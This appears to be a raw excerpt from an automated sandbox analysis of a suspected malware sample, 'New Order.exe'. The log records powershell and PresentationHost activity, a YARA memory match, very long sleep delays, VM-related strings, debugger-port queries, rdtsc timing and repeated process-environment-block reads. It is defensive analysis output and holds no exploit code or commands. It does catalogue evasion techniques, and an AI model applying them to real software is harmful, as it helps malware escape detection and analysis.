                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: New Order.exe PID: 7592, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFCC372D324
                Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFCC372D7E4
                Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFCC372D944
                Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFCC372D504
                Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFCC372D544
                Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFCC372D1E4
                Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFCC3730154
                Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFCC372DA44
                Source: C:\Users\user\Desktop\New Order.exeMemory allocated: 2510000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory allocated: 26C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory allocated: 46C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory allocated: 8A30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory allocated: 9A30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory allocated: 9C40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory allocated: AC40000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD096E rdtsc 8_2_00FD096E
                Source: C:\Users\user\Desktop\New Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4970Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 353Jump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeWindow / User API: threadDelayed 666Jump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeWindow / User API: threadDelayed 9306Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\PresentationHost.exeAPI coverage: 2.0 %
                Source: C:\Users\user\Desktop\New Order.exe TID: 7612Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8120Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 4416Thread sleep count: 666 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 4416Thread sleep time: -1332000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 4416Thread sleep count: 9306 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 4416Thread sleep time: -18612000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exe TID: 7952Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\PresentationHost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\New Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 9WAxm5F77VClmSoGxi.exe, 0000000F.00000002.2433672276.00000000007C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                Source: New Order.exe, 00000000.00000002.1284094121.0000000000831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\(
                Source: PresentationHost.exe, 0000000E.00000002.2432624467.00000000029AE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.1965460211.0000022C1EB5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\New Order.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD096E rdtsc 8_2_00FD096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00417EE3 LdrLoadDll,8_2_00417EE3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8C0F0 mov eax, dword ptr fs:[00000030h]8_2_00F8C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD20F0 mov ecx, dword ptr fs:[00000030h]8_2_00FD20F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103E10E mov eax, dword ptr fs:[00000030h]8_2_0103E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103E10E mov ecx, dword ptr fs:[00000030h]8_2_0103E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103E10E mov eax, dword ptr fs:[00000030h]8_2_0103E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103E10E mov eax, dword ptr fs:[00000030h]8_2_0103E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103E10E mov ecx, dword ptr fs:[00000030h]8_2_0103E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103E10E mov eax, dword ptr fs:[00000030h]8_2_0103E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103E10E mov eax, dword ptr fs:[00000030h]8_2_0103E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103E10E mov ecx, dword ptr fs:[00000030h]8_2_0103E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103E10E mov eax, dword ptr fs:[00000030h]8_2_0103E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103E10E mov ecx, dword ptr fs:[00000030h]8_2_0103E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01050115 mov eax, dword ptr fs:[00000030h]8_2_01050115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F980E9 mov eax, dword ptr fs:[00000030h]8_2_00F980E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8A0E3 mov ecx, dword ptr fs:[00000030h]8_2_00F8A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103A118 mov ecx, dword ptr fs:[00000030h]8_2_0103A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103A118 mov eax, dword ptr fs:[00000030h]8_2_0103A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103A118 mov eax, dword ptr fs:[00000030h]8_2_0103A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103A118 mov eax, dword ptr fs:[00000030h]8_2_0103A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01024144 mov eax, dword ptr fs:[00000030h]8_2_01024144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01024144 mov eax, dword ptr fs:[00000030h]8_2_01024144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01024144 mov ecx, dword ptr fs:[00000030h]8_2_01024144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01024144 mov eax, dword ptr fs:[00000030h]8_2_01024144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01024144 mov eax, dword ptr fs:[00000030h]8_2_01024144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F880A0 mov eax, dword ptr fs:[00000030h]8_2_00F880A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01028158 mov eax, dword ptr fs:[00000030h]8_2_01028158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01064164 mov eax, dword ptr fs:[00000030h]8_2_01064164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01064164 mov eax, dword ptr fs:[00000030h]8_2_01064164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9208A mov eax, dword ptr fs:[00000030h]8_2_00F9208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01034180 mov eax, dword ptr fs:[00000030h]8_2_01034180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01034180 mov eax, dword ptr fs:[00000030h]8_2_01034180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBC073 mov eax, dword ptr fs:[00000030h]8_2_00FBC073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0104C188 mov eax, dword ptr fs:[00000030h]8_2_0104C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0104C188 mov eax, dword ptr fs:[00000030h]8_2_0104C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101019F mov eax, dword ptr fs:[00000030h]8_2_0101019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101019F mov eax, dword ptr fs:[00000030h]8_2_0101019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101019F mov eax, dword ptr fs:[00000030h]8_2_0101019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101019F mov eax, dword ptr fs:[00000030h]8_2_0101019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F92050 mov eax, dword ptr fs:[00000030h]8_2_00F92050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010561C3 mov eax, dword ptr fs:[00000030h]8_2_010561C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010561C3 mov eax, dword ptr fs:[00000030h]8_2_010561C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100E1D0 mov eax, dword ptr fs:[00000030h]8_2_0100E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100E1D0 mov eax, dword ptr fs:[00000030h]8_2_0100E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100E1D0 mov ecx, dword ptr fs:[00000030h]8_2_0100E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100E1D0 mov eax, dword ptr fs:[00000030h]8_2_0100E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100E1D0 mov eax, dword ptr fs:[00000030h]8_2_0100E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8A020 mov eax, dword ptr fs:[00000030h]8_2_00F8A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8C020 mov eax, dword ptr fs:[00000030h]8_2_00F8C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010661E5 mov eax, dword ptr fs:[00000030h]8_2_010661E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE016 mov eax, dword ptr fs:[00000030h]8_2_00FAE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE016 mov eax, dword ptr fs:[00000030h]8_2_00FAE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE016 mov eax, dword ptr fs:[00000030h]8_2_00FAE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE016 mov eax, dword ptr fs:[00000030h]8_2_00FAE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01014000 mov ecx, dword ptr fs:[00000030h]8_2_01014000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01032000 mov eax, dword ptr fs:[00000030h]8_2_01032000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01032000 mov eax, dword ptr fs:[00000030h]8_2_01032000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01032000 mov eax, dword ptr fs:[00000030h]8_2_01032000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01032000 mov eax, dword ptr fs:[00000030h]8_2_01032000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01032000 mov eax, dword ptr fs:[00000030h]8_2_01032000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01032000 mov eax, dword ptr fs:[00000030h]8_2_01032000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01032000 mov eax, dword ptr fs:[00000030h]8_2_01032000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01032000 mov eax, dword ptr fs:[00000030h]8_2_01032000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC01F8 mov eax, dword ptr fs:[00000030h]8_2_00FC01F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01026030 mov eax, dword ptr fs:[00000030h]8_2_01026030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01016050 mov eax, dword ptr fs:[00000030h]8_2_01016050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8A197 mov eax, dword ptr fs:[00000030h]8_2_00F8A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8A197 mov eax, dword ptr fs:[00000030h]8_2_00F8A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8A197 mov eax, dword ptr fs:[00000030h]8_2_00F8A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD0185 mov eax, dword ptr fs:[00000030h]8_2_00FD0185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010280A8 mov eax, dword ptr fs:[00000030h]8_2_010280A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F96154 mov eax, dword ptr fs:[00000030h]8_2_00F96154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F96154 mov eax, dword ptr fs:[00000030h]8_2_00F96154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8C156 mov eax, dword ptr fs:[00000030h]8_2_00F8C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010560B8 mov eax, dword ptr fs:[00000030h]8_2_010560B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010560B8 mov ecx, dword ptr fs:[00000030h]8_2_010560B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC0124 mov eax, dword ptr fs:[00000030h]8_2_00FC0124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010120DE mov eax, dword ptr fs:[00000030h]8_2_010120DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010160E0 mov eax, dword ptr fs:[00000030h]8_2_010160E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA02E1 mov eax, dword ptr fs:[00000030h]8_2_00FA02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA02E1 mov eax, dword ptr fs:[00000030h]8_2_00FA02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA02E1 mov eax, dword ptr fs:[00000030h]8_2_00FA02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01068324 mov eax, dword ptr fs:[00000030h]8_2_01068324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01068324 mov ecx, dword ptr fs:[00000030h]8_2_01068324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01068324 mov eax, dword ptr fs:[00000030h]8_2_01068324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01068324 mov eax, dword ptr fs:[00000030h]8_2_01068324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A2C3 mov eax, dword ptr fs:[00000030h]8_2_00F9A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A2C3 mov eax, dword ptr fs:[00000030h]8_2_00F9A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A2C3 mov eax, dword ptr fs:[00000030h]8_2_00F9A2C3
